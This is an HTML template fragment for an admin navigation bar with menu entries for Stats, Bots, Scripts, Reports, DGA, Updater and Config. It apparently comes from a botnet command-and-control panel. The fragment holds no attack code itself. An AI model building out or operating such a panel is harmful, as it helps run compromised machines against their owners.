<div class="row">
	<div class="col-xs-12">
		<nav class="navbar navbar-default">
			<ul class="nav navbar-nav">
				<li class="{STATS_ACTIVE}"> <a href="{CORE_FILE}?act=stats">Stats</a> </li>
				<li class="{BOTS_ACTIVE}"> <a href="{CORE_FILE}?act=bots">Bots</a> </li>
				<li class="{SCRIPTS_ACTIVE}"> <a href="{CORE_FILE}?act=scripts">Scripts</a> </li>
				<li class="{REPORTS_ACTIVE}"> <a href="{CORE_FILE}?act=reports">Reports</a> </li>
				<li class="{DGA_ACTIVE}"> <a href="{CORE_FILE}?act=dga">DGA</a> </li>
				<li class="{UPDATER_ACTIVE}"> <a href="{CORE_FILE}?act=updater">Updater</a> </li>
				<li class="{CONFIG_ACTIVE}"> <a href="{CORE_FILE}?act=edit_config">Config</a> </li>
				<li> <a href="{CORE_FILE}?act=logout">Logout</a> </li>
			</ul>
			<div class="pull-right" style="margin: 5px 10px 0 0"> Current version: 1.4.1 <br/> GMT: {CUR_TIME} </div>
		</nav>
	</div>
</div>
